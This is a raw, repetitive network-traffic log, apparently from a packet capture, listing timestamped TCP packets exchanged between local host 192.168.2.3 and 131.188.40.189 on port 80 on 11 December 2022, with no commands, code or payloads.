                          Dec 11, 2022 09:25:06.589910984 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.589951038 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.589958906 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590003967 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590042114 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.590053082 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590080976 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590123892 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590130091 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.590167046 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590212107 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.590215921 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590257883 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590301037 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.590308905 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.591582060 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.591634035 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608150959 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608217001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608263969 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608289003 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608310938 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608366013 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608367920 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608409882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608454943 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608462095 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608499050 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608544111 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608547926 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608587980 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608633041 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608634949 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608679056 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608716965 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608721972 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608766079 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608805895 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608809948 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608853102 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608896971 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608917952 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.608946085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608989954 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.608993053 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609035969 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609074116 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609077930 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609122992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609159946 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609168053 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609213114 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609249115 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609256983 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609299898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609338999 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609365940 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609388113 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609428883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609430075 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609474897 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609510899 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609517097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609569073 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609606028 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609611988 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609694004 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609731913 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609736919 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609782934 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609818935 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609827042 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609889030 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609925985 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.609936953 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.609981060 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610017061 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610023022 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610068083 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610105038 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610110044 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610153913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610191107 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610202074 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610270023 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610306978 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610312939 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610361099 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610395908 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610404015 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610450029 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610487938 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610492945 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610538006 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610573053 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610582113 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610625029 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610666037 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610668898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610712051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610749960 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610755920 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610801935 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610837936 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610843897 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610925913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.610969067 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.610975027 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611020088 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611063004 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611076117 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611108065 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611150980 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611170053 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611197948 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611236095 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611242056 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611285925 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611326933 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611330986 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611378908 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611428022 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611429930 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611474037 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611509085 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611516953 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611562967 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611608028 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611610889 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611654043 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611684084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611690998 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.611740112 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611780882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.611808062 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.642533064 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.662636042 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662704945 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662753105 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.662765980 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662813902 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662856102 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.662859917 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662935019 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.662972927 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.662983894 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663041115 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663077116 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663084030 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663130045 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663165092 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663175106 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663219929 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663258076 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663264990 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663311958 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663346052 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663356066 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663424015 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663459063 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663469076 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663512945 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663549900 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663558006 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663603067 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663642883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663646936 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663691998 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663728952 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663734913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663783073 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663819075 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663825989 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663871050 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663908005 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.663917065 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663960934 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.663997889 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664005995 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664052010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664087057 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664094925 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664139986 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664176941 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664185047 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664227962 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664268017 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664271116 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664314985 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664355993 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664360046 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664417028 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664458036 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664458990 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664505959 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664551020 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664562941 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664616108 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664649963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664653063 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664732933 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664764881 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664793968 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664793968 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664835930 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664836884 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664881945 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664928913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.664931059 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.664973021 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665011883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665015936 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665060043 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665101051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665103912 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665144920 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665184975 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665188074 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665230989 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665273905 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665287018 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665328979 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665373087 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665393114 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665427923 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665469885 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665471077 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665514946 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665560007 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665566921 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665602922 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665644884 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665656090 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665702105 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665744066 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665754080 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665857077 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665901899 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665910006 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665952921 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.665994883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.665997028 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666043997 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666086912 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666090012 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666131020 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666173935 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666174889 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666229010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666270018 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666270971 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666316032 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666359901 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666363001 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666404009 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666445971 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666446924 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666491032 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666533947 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666547060 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666578054 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666620016 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666620970 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666666031 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666711092 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666711092 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666755915 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666795015 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666799068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666842937 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666889906 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.666908026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666970015 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.666992903 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.667022943 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687015057 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687083006 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687129021 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687155962 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687172890 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687207937 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687218904 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687266111 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687308073 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687309980 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687354088 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687395096 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687400103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687438011 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687446117 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687489986 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687532902 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687535048 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687578917 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687622070 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687623978 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687669039 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687712908 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687755108 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687756062 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687799931 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687840939 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687843084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687885046 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.687886000 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687937975 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687982082 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.687984943 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688025951 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688069105 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688076973 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688112974 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688155890 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688168049 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688199043 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688242912 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688249111 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688287020 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688332081 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688373089 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688374996 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688420057 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688462019 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688465118 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688504934 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688505888 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688550949 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688596010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688596010 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688626051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688668966 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688692093 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688711882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688771009 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688815117 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688823938 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688853979 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.688858032 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688901901 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.688961983 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689004898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689038038 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689049959 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689064026 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689094067 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689136982 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689172983 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689182997 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689229965 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689245939 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689274073 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689316988 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689317942 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689362049 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689404964 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.689421892 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.689450979 CET8049692131.188.40.189192.168.2.3
